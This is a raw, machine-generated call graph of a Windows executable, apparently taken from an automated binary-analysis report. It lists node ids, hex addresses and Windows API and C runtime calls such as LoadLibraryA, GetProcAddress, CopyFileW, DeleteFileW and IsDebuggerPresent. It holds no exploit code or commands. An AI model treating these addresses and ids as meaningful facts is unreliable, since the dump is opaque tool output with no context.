105543->105545 105544 8f4e2f 105544->105545 105546 8f4e3b 105544->105546 105766 8f4f0b 105545->105766 105548 8f4e4a 84 API calls 105546->105548 105550 8f4e40 105548->105550 105550->105058 105550->105061 105552 92d91c 105774 8f4ec7 105552->105774 105556 8f7667 59 API calls 105555->105556 105557 8f45b1 105556->105557 105558 8f7667 59 API calls 105557->105558 105559 8f45b9 105558->105559 105560 8f7667 59 API calls 105559->105560 105561 8f45c1 105560->105561 105562 8f7667 59 API calls 105561->105562 105563 8f45c9 105562->105563 105564 92d4d2 105563->105564 105565 8f45fd 105563->105565 105566 8f8047 59 API calls 105564->105566 105567 8f784b 59 API calls 105565->105567 105568 92d4db 105566->105568 105569 8f460b 105567->105569 105570 8f7d8c 59 API calls 105568->105570 105571 8f7d2c 59 API calls 105569->105571 105573 8f4640 105570->105573 105572 8f4615 105571->105572 105572->105573 105574 8f784b 59 API calls 105572->105574 105575 8f4680 105573->105575 105577 8f465f 105573->105577 105588 92d4fb 105573->105588 105578 8f4636 105574->105578 105576 8f784b 59 API calls 105575->105576 105579 8f4691 105576->105579 105582 8f79f2 59 API calls 105577->105582 105581 8f7d2c 59 API calls 105578->105581 105583 8f46a3 105579->105583 105586 8f8047 59 API calls 105579->105586 105580 92d5cb 105584 8f7bcc 59 API calls 105580->105584 105581->105573 105585 8f4669 105582->105585 105587 8f46b3 105583->105587 105589 8f8047 59 API calls 105583->105589 105601 92d588 105584->105601 105585->105575 105592 8f784b 59 API calls 105585->105592 105586->105583 105591 8f46ba 105587->105591 105593 8f8047 59 API calls 105587->105593 105588->105580 105590 92d5b4 105588->105590 105600 92d532 105588->105600 105589->105587 105590->105580 105596 92d59f 105590->105596 105594 8f8047 59 API calls 105591->105594 105603 8f46c1 Mailbox 105591->105603 105592->105575 105593->105591 105594->105603 105595 8f79f2 59 API calls 105595->105601 105599 8f7bcc 59 API calls 105596->105599 105597 92d590 105598 8f7bcc 59 API calls 105597->105598 105598->105601 105599->105601 105600->105597 105604 92d57b 105600->105604 105601->105575 105601->105595 105940 8f7924 59 API calls 2 library calls 105601->105940 105603->105089 105605 8f7bcc 59 API calls 105604->105605 105605->105601 105607 8f7e4f 59 API calls 105606->105607 105608 8f79fd 105607->105608 105608->105096 105608->105098 105610 92ec6b 105609->105610 105611 8f7b40 105609->105611 105947 947bdb 59 API calls _memmove 105610->105947 105941 8f7a51 105611->105941 105614 8f7b4c 105614->105105 105615 92ec75 105616 8f8047 59 API calls 105615->105616 105617 92ec7d Mailbox 105616->105617 105619 95408d 105618->105619 105620 9540a0 105619->105620 105621 954092 105619->105621 105623 8f7667 59 API calls 105620->105623 105622 8f8047 59 API calls 105621->105622 105671 95409b Mailbox 105622->105671 105624 9540a8 105623->105624 105625 8f7667 59 API calls 105624->105625 105626 9540b0 105625->105626 105627 8f7667 59 API calls 105626->105627 105628 9540bb 105627->105628 105629 8f7667 59 API calls 105628->105629 105630 9540c3 105629->105630 105631 8f7667 59 API calls 105630->105631 105632 9540cb 105631->105632 105633 8f7667 59 API calls 105632->105633 105634 9540d3 105633->105634 105635 8f7667 59 API calls 105634->105635 105636 9540db 105635->105636 105637 8f7667 59 API calls 105636->105637 105638 9540e3 105637->105638 105639 8f459b 59 API calls 105638->105639 105640 9540fa 105639->105640 105641 8f459b 59 API calls 105640->105641 105642 954113 105641->105642 105643 8f79f2 59 API calls 105642->105643 105644 95411f 105643->105644 105645 954132 105644->105645 105646 8f7d2c 59 API calls 105644->105646 105647 8f79f2 59 API calls 105645->105647 105646->105645 105648 95413b 105647->105648 105649 95414b 105648->105649 105650 8f7d2c 59 API calls 105648->105650 105651 8f8047 59 API calls 105649->105651 105650->105649 105652 954157 105651->105652 105653 8f7b2e 59 API calls 105652->105653 105654 954163 105653->105654 105948 954223 59 API calls 105654->105948 105656 954172 105949 954223 59 API calls 105656->105949 105658 954185 105659 8f79f2 59 API calls 105658->105659 105660 95418f 105659->105660 105661 954194 105660->105661 105662 9541a6 105660->105662 105663 8f7cab 59 API calls 105661->105663 105664 8f79f2 59 API calls 105662->105664 105670 9541a1 105663->105670 105665 9541af 105664->105665 105666 9541cd 105665->105666 105669 8f7cab 59 API calls 105665->105669 105668 8f7b2e 59 API calls 105666->105668 105667 8f7b2e 59 API calls 105667->105666 105668->105671 105669->105670 105670->105667 105671->105113 105673 959162 __write_nolock 105672->105673 105674 910db6 Mailbox 59 API calls 105673->105674 105675 9591bf 105674->105675 105676 8f522e 59 API calls 105675->105676 105677 9591c9 105676->105677 105678 958f5f GetSystemTimeAsFileTime 105677->105678 105679 9591d4 105678->105679 105680 8f4ee5 85 API calls 105679->105680 105681 9591e7 _wcscmp 105680->105681 105682 9592b8 105681->105682 105683 95920b 105681->105683 105684 959734 96 API calls 105682->105684 105967 959734 105683->105967 105700 959284 _wcscat 105684->105700 105688 8f4f0b 74 API calls 105690 9592dd 105688->105690 105689 9592c1 105689->105120 105691 8f4f0b 74 API calls 105690->105691 105693 9592ed 105691->105693 105692 959239 _wcscat _wcscpy 105974 9140fb 58 API calls __wsplitpath_helper 105692->105974 105694 8f4f0b 74 API calls 105693->105694 105696 959308 105694->105696 105697 8f4f0b 74 API calls 105696->105697 105698 959318 105697->105698 105699 8f4f0b 74 API calls 105698->105699 105701 959333 105699->105701 105700->105688 105700->105689 105702 8f4f0b 74 API calls 105701->105702 105703 959343 105702->105703 105704 8f4f0b 74 API calls 105703->105704 105705 959353 105704->105705 105706 8f4f0b 74 API calls 105705->105706 105707 959363 105706->105707 105950 9598e3 GetTempPathW GetTempFileNameW 105707->105950 105709 95936f 105710 91525b 115 API calls 105709->105710 105718 959380 105710->105718 105711 9153a6 __fcloseall 83 API calls 105712 959445 105711->105712 105714 95945f 105712->105714 105715 95944b DeleteFileW 105712->105715 105713 8f4f0b 74 API calls 105713->105718 105716 959505 CopyFileW 105714->105716 105717 959469 _wcsncpy 105714->105717 105715->105689 105719 95952d DeleteFileW 105716->105719 105720 95951b DeleteFileW 105716->105720 105975 958b06 116 API calls __fcloseall 105717->105975 105718->105689 105718->105713 105725 95943a 105718->105725 105951 914863 105718->105951 105720->105689 105725->105711 105727->105046 105728->105082 105729->105095 105779 8f4c03 105730->105779 105733 8f4bdc 105735 8f4bec FreeLibrary 105733->105735 105736 8f4bf5 105733->105736 105734 8f4c03 2 API calls 105734->105733 105735->105736 105737 91525b 105736->105737 105783 915270 105737->105783 105739 8f4dfc 105739->105536 105739->105537 105864 8f4c36 105740->105864 105743 8f4c36 2 API calls 105746 8f4b8f 105743->105746 105744 8f4baa 105747 8f4c70 105744->105747 105745 8f4ba1 FreeLibrary 105745->105744 105746->105744 105746->105745 105748 910db6 Mailbox 59 API calls 105747->105748 105749 8f4c85 105748->105749 105750 8f522e 59 API calls 105749->105750 105751 8f4c91 _memmove 105750->105751 105752 8f4ccc 105751->105752 105753 8f4d89 105751->105753 105754 8f4dc1 105751->105754 105755 8f4ec7 69 API calls 105752->105755 105868 8f4e89 CreateStreamOnHGlobal 105753->105868 105879 95991b 95 API calls 105754->105879 105758 8f4cd5 105755->105758 105759 8f4f0b 74 API calls 105758->105759 105761 92d8a7 105758->105761 105765 8f4d69 105758->105765 105874 8f4ee5 105758->105874 105759->105758 105762 8f4ee5 85 API calls 105761->105762 105763 92d8bb 105762->105763 105764 8f4f0b 74 API calls 105763->105764 105764->105765 105765->105544 105767 8f4f1d 105766->105767 105768 92d9cd 105766->105768 105897 9155e2 105767->105897 105771 959109 105917 958f5f 105771->105917 105773 95911f 105773->105552 105775 92d990 105774->105775 105776 8f4ed6 105774->105776 105922 915c60 105776->105922 105778 8f4ede 105780 8f4bd0 105779->105780 105781 8f4c0c LoadLibraryA 105779->105781 105780->105733 105780->105734 105781->105780 105782 8f4c1d GetProcAddress 105781->105782 105782->105780 105784 91527c __setmode 105783->105784 105785 91528f 105784->105785 105788 9152c0 105784->105788 105832 918b28 58 API calls __getptd_noexit 105785->105832 105787 915294 105833 918db6 9 API calls __setmode 105787->105833 105802 9204e8 105788->105802 105791 9152c5 105792 9152db 105791->105792 105793 9152ce 105791->105793 105795 915305 105792->105795 105796 9152e5 105792->105796 105834 918b28 58 API calls __getptd_noexit 105793->105834 105817 920607 105795->105817 105835 918b28 58 API calls __getptd_noexit 105796->105835 105799 91529f @_EH4_CallFilterFunc@8 __setmode 105799->105739 105803 9204f4 __setmode 105802->105803 105804 919c0b __lock 58 API calls 105803->105804 105815 920502 105804->105815 105805 920576 105837 9205fe 105805->105837 105806 92057d 105842 91881d 58 API calls 2 library calls 105806->105842 105809 920584 105809->105805 105843 919e2b InitializeCriticalSectionAndSpinCount 105809->105843 105810 9205f3 __setmode 105810->105791 105812 919c93 __mtinitlocknum 58 API calls 105812->105815 105814 9205aa EnterCriticalSection 105814->105805 105815->105805 105815->105806 105815->105812 105840 916c50 59 API calls __lock 105815->105840 105841 916cba LeaveCriticalSection LeaveCriticalSection _doexit 105815->105841 105818 920627 __wopenfile 105817->105818 105819 920641 105818->105819 105831 9207fc 105818->105831 105850 9137cb 60 API calls 2 library calls 105818->105850 105848 918b28 58 API calls __getptd_noexit 105819->105848 105821 920646 105849 918db6 9 API calls __setmode 105821->105849 105823 915310 105836 915332 LeaveCriticalSection LeaveCriticalSection _fseek 105823->105836 105824 92085f 105845 9285a1 105824->105845 105827 9207f5 105827->105831 105851 9137cb 60 API calls 2 library calls 105827->105851 105829 920814 105829->105831 105852 9137cb 60 API calls 2 library calls 105829->105852 105831->105819 105831->105824 105832->105787 105833->105799 105834->105799 105835->105799 105836->105799 105844 919d75 LeaveCriticalSection 105837->105844 105839 920605 105839->105810 105840->105815 105841->105815 105842->105809 105843->105814 105844->105839 105853 927d85 105845->105853 105847 9285ba 105847->105823 105848->105821 105849->105823 105850->105827 105851->105829 105852->105831 105854 927d91 __setmode 105853->105854 105855 927da7 105854->105855 105858 927ddd 105854->105858 105856 918b28 __setmode 58 API calls 105855->105856 105857 927dac 105856->105857 105859 918db6 __setmode 9 API calls 105857->105859 105860 927e4e __wsopen_nolock 109 API calls 105858->105860 105863 927db6 __setmode 105859->105863 105861 927df9 105860->105861 105862 927e22 __wsopen_helper LeaveCriticalSection 105861->105862 105862->105863 105863->105847 105865 8f4b83 105864->105865 105866 8f4c3f LoadLibraryA 105864->105866 105865->105743 105865->105746 105866->105865 105867 8f4c50 GetProcAddress 105866->105867 105867->105865 105869 8f4ea3 FindResourceExW 105868->105869 105873 8f4ec0 105868->105873 105870 92d933 LoadResource 105869->105870 105869->105873 105871 92d948 SizeofResource 105870->105871 105870->105873 105872 92d95c LockResource 105871->105872 105871->105873 105872->105873 105873->105752 105875 8f4ef4 105874->105875 105878 92d9ab 105874->105878 105880 91584d 105875->105880 105877 8f4f02 105877->105758 105879->105752 105881 915859 __setmode 105880->105881 105882 91586b 105881->105882 105884 915891 105881->105884 105893 918b28 58 API calls __getptd_noexit 105882->105893 105886 916c11 __lock_file 59 API calls 105884->105886 105885 915870 105894 918db6 9 API calls __setmode 105885->105894 105888 915897 105886->105888 105895 9157be 83 API calls 5 library calls 105888->105895 105890 9158a6 105896 9158c8 LeaveCriticalSection LeaveCriticalSection _fseek 105890->105896 105892 91587b __setmode 105892->105877 105893->105885 105894->105892 105895->105890 105896->105892 105900 9155fd 105897->105900 105899 8f4f2e 105899->105771 105901 915609 __setmode 105900->105901 105902 91564c 105901->105902 105903 915644 __setmode 105901->105903 105905 91561f _memset 105901->105905 105904 916c11 __lock_file 59 API calls 105902->105904 105903->105899 105907 915652 105904->105907 105913 918b28 58 API calls __getptd_noexit 105905->105913 105915 91541d 72 API calls 6 library calls 105907->105915 105908 915639 105914 918db6 9 API calls __setmode 105908->105914 105911 915668 105916 915686 LeaveCriticalSection LeaveCriticalSection _fseek 105911->105916 105913->105908 105914->105903 105915->105911 105916->105903 105920 91520a GetSystemTimeAsFileTime 105917->105920 105919 958f6e 105919->105773 105921 915238 __aulldiv 105920->105921 105921->105919 105923 915c6c __setmode 105922->105923 105924 915c93 105923->105924 105925 915c7e 105923->105925 105926 916c11 __lock_file 59 API calls 105924->105926 105936 918b28 58 API calls __getptd_noexit 105925->105936 105928 915c99 105926->105928 105938 9158d0 67 API calls 6 library calls 105928->105938 105929 915c83 105937 918db6 9 API calls __setmode 105929->105937 105932 915ca4 105939 915cc4 LeaveCriticalSection LeaveCriticalSection _fseek 105932->105939 105934 915cb6 105935 915c8e __setmode 105934->105935 105935->105778 105936->105929 105937->105935 105938->105932 105939->105934 105940->105601 105942 8f7a5f 105941->105942 105946 8f7a85 _memmove 105941->105946 105943 910db6 Mailbox 59 API calls 105942->105943 105942->105946 105944 8f7ad4 105943->105944 105945 910db6 Mailbox 59 API calls 105944->105945 105945->105946 105946->105614 105947->105615 105948->105656 105949->105658 105950->105709 105952 91486f __setmode 105951->105952 105953 9148a5 105952->105953 105954 91488d 105952->105954 105956 91489d __setmode 105952->105956 105957 916c11 __lock_file 59 API calls 105953->105957 105988 918b28 58 API calls __getptd_noexit 105954->105988 105956->105718 105959 9148ab 105957->105959 105958 914892 105989 918db6 9 API calls __setmode 105958->105989 105976 91470a 105959->105976 105968 959748 __tzset_nolock _wcscmp 105967->105968 105969 959210 105968->105969 105970 8f4f0b 74 API calls 105968->105970 105971 959109 GetSystemTimeAsFileTime 105968->105971 105972 8f4ee5 85 API calls 105968->105972 105969->105689 105973 9140fb 58 API calls __wsplitpath_helper 105969->105973 105970->105968 105971->105968 105972->105968 105973->105692 105974->105700 105988->105958 105989->105956 106020 8f7a16 105994->106020 105996 8f646a 106027 8f750f 105996->106027 105998 8f6484 Mailbox 105998->105125 106001 8f7d8c 59 API calls 106015 8f6265 106001->106015 106002 8f750f 59 API calls 106002->106015 106003 92dff6 106037 94f8aa 91 API calls 4 library calls 106003->106037 106007 92e004 106008 8f750f 59 API calls 106007->106008 106010 92e01a 106008->106010 106009 8f6799 _memmove 106038 94f8aa 91 API calls 4 library calls 106009->106038 106010->105998 106011 92df92 106012 8f8029 59 API calls 106011->106012 106014 92df9d 106012->106014 106018 910db6 Mailbox 59 API calls 106014->106018 106015->105996 106015->106001 106015->106002 106015->106003 106015->106009 106015->106011 106016 8f7e4f 59 API calls 106015->106016 106025 8f5f6c 60 API calls 106015->106025 106026 8f5d41 59 API calls Mailbox 106015->106026 106035 8f5e72 60 API calls 106015->106035 106036 8f7924 59 API calls 2 library calls 106015->106036 106017 8f643b CharUpperBuffW 106016->106017 106017->106015 106018->106009 106019->105129 106021 910db6 Mailbox 59 API calls 106020->106021 106022 8f7a3b 106021->106022 106023 8f8029 59 API calls 106022->106023 106024 8f7a4a 106023->106024 106024->106015 106025->106015 106026->106015 106028 8f75af 106027->106028 106032 8f7522 _memmove 106027->106032 106030 910db6 Mailbox 59 API calls 106028->106030 106029 910db6 Mailbox 59 API calls 106031 8f7529 106029->106031 106030->106032 106033 910db6 Mailbox 59 API calls 106031->106033 106034 8f7552 106031->106034 106032->106029 106033->106034 106034->105998 106035->106015 106036->106015 106037->106007 106038->105998 106040 953c3e 106039->106040 106041 954475 FindFirstFileW 106039->106041 106040->104976 106041->106040 106042 95448a FindClose 106041->106042 106042->106040 106043->105004 106044->104999 106045->104862 106046->104892 106047->104892 106048->104888 106049->104886 106050->104879 106051->104886 106052->104901 106053->104924 106054 917c56 106055 917c62 __setmode 106054->106055 106091 919e08 GetStartupInfoW 106055->106091 106057 917c67 106093 918b7c GetProcessHeap 106057->106093 106059 917cbf 106062 917cca 106059->106062 106176 917da6 58 API calls 3 library calls 106059->106176 106094 919ae6 106062->106094 106063 917cd0 106064 917cdb __RTC_Initialize 106063->106064 106177 917da6 58 API calls 3 library calls 106063->106177 106115 91d5d2 106064->106115 106067 917cea 106068 917cf6 GetCommandLineW 106067->106068 106178 917da6 58 API calls 3 library calls 106067->106178 106134 924f23 GetEnvironmentStringsW 106068->106134 106071 917cf5 106071->106068 106074 917d10 106075 917d1b 106074->106075 106179 9130b5 58 API calls 3 library calls 106074->106179 106144 924d58 106075->106144 106078 917d21 106079 917d2c 106078->106079 106180 9130b5 58 API calls 3 library calls 106078->106180 106158 9130ef 106079->106158 106082 917d34 106083 917d3f __wwincmdln 106082->106083 106181 9130b5 58 API calls 3 library calls 106082->106181 106164 8f47d0 106083->106164 106086 917d53 106087 917d62 106086->106087 106182 913358 58 API calls _doexit 106086->106182 106183 9130e0 58 API calls _doexit 106087->106183 106090 917d67 __setmode 106092 919e1e 106091->106092 106092->106057 106093->106059 106184 913187 36 API calls 2 library calls 106094->106184 106096 919aeb 106185 919d3c InitializeCriticalSectionAndSpinCount __ioinit 106096->106185 106098 919af4 106186 919b5c 61 API calls 2 library calls 106098->106186 106099 919af0 106099->106098 106187 919d8a TlsAlloc 106099->106187 106102 919af9 106102->106063 106103 919b06 106103->106098 106104 919b11 106103->106104 106188 9187d5 106104->106188 106107 919b53 106196 919b5c 61 API calls 2 library calls 106107->106196 106110 919b32 106110->106107 106112 919b38 106110->106112 106111 919b58 106111->106063 106195 919a33 58 API calls 4 library calls 106112->106195 106114 919b40 GetCurrentThreadId 106114->106063 106116 91d5de __setmode 106115->106116 106117 919c0b __lock 58 API calls 106116->106117 106118 91d5e5 106117->106118 106119 9187d5 __calloc_crt 58 API calls 106118->106119 106121 91d5f6 106119->106121 106120 91d661 GetStartupInfoW 106128 91d676 106120->106128 106129 91d7a5 106120->106129 106121->106120 106122 91d601 @_EH4_CallFilterFunc@8 __setmode 106121->106122 106122->106067 106123 91d86d 106210 91d87d LeaveCriticalSection _doexit 106123->106210 106125 9187d5 __calloc_crt 58 API calls 106125->106128 106126 91d7f2 GetStdHandle 106126->106129 106127 91d805 GetFileType 106127->106129 106128->106125 106128->106129 106130 91d6c4 106128->106130 106129->106123 106129->106126 106129->106127 106209 919e2b InitializeCriticalSectionAndSpinCount 106129->106209 106130->106129 106131 91d6f8 GetFileType 106130->106131 106208 919e2b InitializeCriticalSectionAndSpinCount 106130->106208 106131->106130 106135 924f34 106134->106135 106136 917d06 106134->106136 106211 91881d 58 API calls 2 library calls 106135->106211 106140 924b1b GetModuleFileNameW 106136->106140 106138 924f5a _memmove 106139 924f70 FreeEnvironmentStringsW 106138->106139 106139->106136 106141 924b4f _wparse_cmdline 106140->106141 106143 924b8f _wparse_cmdline 106141->106143 106212 91881d 58 API calls 2 library calls 106141->106212 106143->106074 106145 924d71 __wsetenvp 106144->106145 106146 924d69 106144->106146 106147 9187d5 __calloc_crt 58 API calls 106145->106147 106146->106078 106150 924d9a __wsetenvp 106147->106150 106148 924df1 106149 912d55 _free 58 API calls 106148->106149 106149->106146 106150->106146 106150->106148 106151 9187d5 __calloc_crt 58 API calls 106150->106151 106152 924e16 106150->106152 106155 924e2d 106150->106155 106213 924607 58 API calls __setmode 106150->106213 106151->106150 106154 912d55 _free 58 API calls 106152->106154 106154->106146 106214 918dc6 IsProcessorFeaturePresent 106155->106214 106157 924e39 106157->106078 106159 9130fb __IsNonwritableInCurrentImage 106158->106159 106229 91a4d1 106159->106229 106161 913119 __initterm_e 106162 912d40 __cinit 67 API calls 106161->106162 106163 913138 __cinit __IsNonwritableInCurrentImage 106161->106163 106162->106163 106163->106082 106165 8f47ea 106164->106165 106175 8f4889 106164->106175 106166 8f4824 IsThemeActive 106165->106166 106232 91336c 106166->106232 106170 8f4850 106244 8f48fd SystemParametersInfoW SystemParametersInfoW 106170->106244 106172 8f485c 106245 8f3b3a 106172->106245 106174 8f4864 SystemParametersInfoW 106174->106175 106175->106086 106176->106062 106177->106064 106178->106071 106182->106087 106183->106090 106184->106096 106185->106099 106186->106102 106187->106103 106190 9187dc 106188->106190 106191 918817 106190->106191 106193 9187fa 106190->106193 106197 9251f6 106190->106197 106191->106107 106194 919de6 TlsSetValue 106191->106194 106193->106190 106193->106191 106205 91a132 Sleep 106193->106205 106194->106110 106195->106114 106196->106111 106198 925201 106197->106198 106199 92521c 106197->106199 106198->106199 106200 92520d 106198->106200 106201 92522c HeapAlloc 106199->106201 106203 925212 106199->106203 106207 9133a1 DecodePointer 106199->106207 106206 918b28 58 API calls __getptd_noexit 106200->106206 106201->106199 106201->106203 106203->106190 106205->106193 106206->106203 106207->106199 106208->106130 106209->106129 106210->106122 106211->106138 106212->106143 106213->106150 106215 918dd1 106214->106215 106220 918c59 106215->106220 106219 918dec 106219->106157 106221 918c73 _memset ___raise_securityfailure 106220->106221 106222 918c93 IsDebuggerPresent 106221->106222 106228 91a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 106222->106228 106224 918d57 ___raise_securityfailure 106225 91c5f6 __fltin2 6 API calls 106224->106225 106226 918d7a 106225->106226 106227 91a140 GetCurrentProcess TerminateProcess 106226->106227 106227->106219 106228->106224 106230 91a4d4 EncodePointer 106229->106230 106230->106230 106231 91a4ee 106230->106231 106231->106161 106233 919c0b __lock 58 API calls 106232->106233 106234 913377 DecodePointer EncodePointer 106233->106234 106297 919d75 LeaveCriticalSection 106234->106297 106236 8f4849 106237 9133d4 106236->106237 106238 9133f8 106237->106238 106239 9133de 106237->106239 106238->106170 106239->106238 106298 918b28 58 API calls __getptd_noexit 106239->106298 106241 9133e8 106299 918db6 9 API calls __setmode 106241->106299 106243 9133f3 106243->106170 106244->106172 106246 8f3b47 __write_nolock 106245->106246 106247 8f7667 59 API calls 106246->106247 106248 8f3b51 GetCurrentDirectoryW 106247->106248 106300 8f3766 106248->106300 106250 8f3b7a IsDebuggerPresent 106251 92d272 MessageBoxA 106250->106251 106252 8f3b88 106250->106252 106254 92d28c 106251->106254 106252->106254 106255 8f3ba5 106252->106255 106283 8f3c61 106252->106283 106253 8f3c68 SetCurrentDirectoryW 106256 8f3c75 Mailbox 106253->106256 106433 8f7213 59 API calls Mailbox 106254->106433 106381 8f7285 106255->106381 106256->106174 106259 92d29c 106264 92d2b2 SetCurrentDirectoryW 106259->106264 106264->106256 106283->106253 106297->106236 106298->106241 106299->106243 106301 8f7667 59 API calls 106300->106301 106302 8f377c 106301->106302 106435 8f3d31 106302->106435 106304 8f379a 106305 8f4706 61 API calls 106304->106305 106306 8f37ae 106305->106306 106307 8f7de1 59 API calls 106306->106307 106308 8f37bb 106307->106308 106309 8f4ddd 136 API calls 106308->106309 106310 8f37d4 106309->106310 106311 92d173 106310->106311 106312 8f37dc Mailbox 106310->106312 106477 95955b 106311->106477 106316 8f8047 59 API calls 106312->106316 106315 92d192 106318 912d55 _free 58 API calls 106315->106318 106319 8f37ef 106316->106319 106317 8f4e4a 84 API calls 106317->106315 106320 92d19f 106318->106320 106449 8f928a 106319->106449 106322 8f4e4a 84 API calls 106320->106322 106324 92d1a8 106322->106324 106328 8f3ed0 59 API calls 106324->106328 106325 8f7de1 59 API calls 106326 8f3808 106325->106326 106327 8f84c0 69 API calls 106326->106327 106329 8f381a Mailbox 106327->106329 106330 92d1c3 106328->106330 106331 8f7de1 59 API calls 106329->106331 106332 8f3ed0 59 API calls 106330->106332 106333 8f3840 106331->106333 106334 92d1df 106332->106334 106335 8f84c0 69 API calls 106333->106335 106336 8f4706 61 API calls 106334->106336 106338 8f384f Mailbox 106335->106338 106337 92d204 106336->106337 106339 8f3ed0 59 API calls 106337->106339 106341 8f7667 59 API calls 106338->106341 106340 92d210 106339->106340 106342 8f8047 59 API calls 106340->106342 106343 8f386d 106341->106343 106344 92d21e 106342->106344 106452 8f3ed0 106343->106452 106346 8f3ed0 59 API calls 106344->106346 106348 92d22d 106346->106348 106354 8f8047 59 API calls 106348->106354 106350 8f3887 106350->106324 106351 8f3891 106350->106351 106352 912efd _W_store_winword 60 API calls 106351->106352 106353 8f389c 106352->106353 106353->106330 106355 8f38a6 106353->106355 106356 92d24f 106354->106356 106357 912efd _W_store_winword 60 API calls 106355->106357 106358 8f3ed0 59 API calls 106356->106358 106359 8f38b1 106357->106359 106360 92d25c 106358->106360 106359->106334 106361 8f38bb 106359->106361 106360->106360 106362 912efd _W_store_winword 60 API calls 106361->106362 106363 8f38c6 106362->106363 106363->106348 106364 8f3907 106363->106364 106366 8f3ed0 59 API calls 106363->106366 106364->106348 106365 8f3914 106364->106365 106367 8f92ce 59 API calls 106365->106367 106368 8f38ea 106366->106368 106369 8f3924 106367->106369 106370 8f8047 59 API calls 106368->106370 106371 8f9050 59 API calls 106369->106371 106372 8f38f8 106370->106372 106373 8f3932 106371->106373 106374 8f3ed0 59 API calls 106372->106374 106468 8f8ee0 106373->106468 106374->106364 106376 8f928a 59 API calls 106378 8f394f 106376->106378 106377 8f8ee0 60 API calls 106377->106378 106378->106376 106378->106377 106379 8f3995 Mailbox 106378->106379 106380 8f3ed0 59 API calls 106378->106380 106379->106250 106380->106378 106382 8f7292 __write_nolock 106381->106382 106383 92ea22 _memset 106382->106383 106384 8f72ab 106382->106384 106387 92ea3e GetOpenFileNameW 106383->106387 106385 8f4750 60 API calls 106384->106385 106386 8f72b4 106385->106386 106517 910791 106386->106517 106388 92ea8d 106387->106388 106390 8f7bcc 59 API calls 106388->106390 106392 92eaa2 106390->106392 106392->106392 106394 8f72c9 106535 8f686a 106394->106535 106433->106259 106436 8f3d3e __write_nolock 106435->106436 106437 8f7bcc 59 API calls 106436->106437 106447 8f3ea4 Mailbox 106436->106447 106439 8f3d70 106437->106439 106438 8f79f2 59 API calls 106438->106439 106439->106438 106448 8f3da6 Mailbox 106439->106448 106440 8f79f2 59 API calls 106440->106448 106441 8f3e77 106442 8f7de1 59 API calls 106441->106442 106441->106447 106444 8f3e98 106442->106444 106443 8f7de1 59 API calls 106443->106448 106445 8f3f74 59 API calls 106444->106445 106445->106447 106446 8f3f74 59 API calls 106446->106448 106447->106304 106448->106440 106448->106441 106448->106443 106448->106446 106448->106447 106450 910db6 Mailbox 59 API calls 106449->106450 106451 8f37fb 106450->106451 106451->106325 106453 8f3eda 106452->106453 106454 8f3ef3 106452->106454 106456 8f8047 59 API calls 106453->106456 106455 8f7bcc 59 API calls 106454->106455 106457 8f3879 106455->106457 106456->106457 106458 912efd 106457->106458 106459 912f09 106458->106459 106460 912f7e 106458->106460 106467 912f2e 106459->106467 106512 918b28 58 API calls __getptd_noexit 106459->106512 106514 912f90 60 API calls 3 library calls 106460->106514 106463 912f8b 106463->106350 106464 912f15 106513 918db6 9 API calls __setmode 106464->106513 106466 912f20 106466->106350 106467->106350 106469 92f17c 106468->106469 106472 8f8ef7 106468->106472 106469->106472 106515 8f8bdb 59 API calls Mailbox 106469->106515 106471 8f8fff 106471->106378 106472->106471 106473 8f8ff8 106472->106473 106474 8f9040 106472->106474 106476 910db6 Mailbox 59 API calls 106473->106476 106475 8f9d3c 60 API calls 106474->106475 106475->106471 106476->106471 106478 8f4ee5 85 API calls 106477->106478 106479 9595ca 106478->106479 106480 959734 96 API calls 106479->106480 106481 9595dc 106480->106481 106482 8f4f0b 74 API calls 106481->106482 106510 92d186 106481->106510 106483 9595f7 106482->106483 106484 8f4f0b 74 API calls 106483->106484 106485 959607 106484->106485 106486 8f4f0b 74 API calls 106485->106486 106487 959622 106486->106487 106488 8f4f0b 74 API calls 106487->106488 106489 95963d 106488->106489 106490 8f4ee5 85 API calls 106489->106490 106491 959654 106490->106491 106492 91571c std::exception::_Copy_str 58 API calls 106491->106492 106493 95965b 106492->106493 106494 91571c std::exception::_Copy_str 58 API calls 106493->106494 106495 959665 106494->106495 106496 8f4f0b 74 API calls 106495->106496 106497 959679 106496->106497 106498 959109 GetSystemTimeAsFileTime 106497->106498 106499 95968c 106498->106499 106500 9596b6 106499->106500 106501 9596a1 106499->106501 106502 9596bc 106500->106502 106503 95971b 106500->106503 106504 912d55 _free 58 API calls 106501->106504 106516 958b06 116 API calls __fcloseall 106502->106516 106506 912d55 _free 58 API calls 106503->106506 106507 9596a7 106504->106507 106506->106510 106508 912d55 _free 58 API calls 106507->106508 106508->106510 106509 959713 106511 912d55 _free 58 API calls 106509->106511 106510->106315 106510->106317 106511->106510 106512->106464 106513->106466 106514->106463 106515->106472 106516->106509 106518 921940 __write_nolock 106517->106518 106519 91079e GetLongPathNameW 106518->106519 106520 8f7bcc 59 API calls 106519->106520 106521 8f72bd 106520->106521 106522 8f700b 106521->106522 106523 8f7667 59 API calls 106522->106523 106524 8f701d 106523->106524 106525 8f4750 60 API calls 106524->106525 106526 8f7028 106525->106526 106527 92e885 106526->106527 106528 8f7033 106526->106528 106532 92e89f 106527->106532 106575 8f7908 61 API calls 106527->106575 106529 8f3f74 59 API calls 106528->106529 106531 8f703f 106529->106531 106569 8f34c2 106531->106569 106534 8f7052 Mailbox 106534->106394 106536 8f4ddd 136 API calls 106535->106536 106537 8f688f 106536->106537 106538 92e031 106537->106538 106539 8f4ddd 136 API calls 106537->106539 106540 95955b 122 API calls 106538->106540 106541 8f68a3 106539->106541 106542 92e046 106540->106542 106541->106538 106543 8f68ab 106541->106543 106544 92e067 106542->106544 106545 92e04a 106542->106545 106547 92e052 106543->106547 106548 8f68b7 106543->106548 106546 910db6 Mailbox 59 API calls 106544->106546 106549 8f4e4a 84 API calls 106545->106549 106568 92e0ac Mailbox 106546->106568 106674 9542f8 90 API calls _wprintf 106547->106674 106576 8f6a8c 106548->106576 106549->106547 106552 92e060 106552->106544 106554 92e260 106555 912d55 _free 58 API calls 106554->106555 106556 92e268 106555->106556 106557 8f4e4a 84 API calls 106556->106557 106562 92e271 106557->106562 106558 8f750f 59 API calls 106558->106568 106561 912d55 _free 58 API calls 106561->106562 106562->106561 106564 8f4e4a 84 API calls 106562->106564 106678 94f7a1 89 API calls 4 library calls 106562->106678 106564->106562 106565 8f7de1 59 API calls 106565->106568 106568->106554 106568->106558 106568->106562 106568->106565 106668 8f735d 106568->106668 106675 94f73d 59 API calls 2 library calls 106568->106675 106676 94f65e 61 API calls 2 library calls 106568->106676 106677 95737f 59 API calls Mailbox 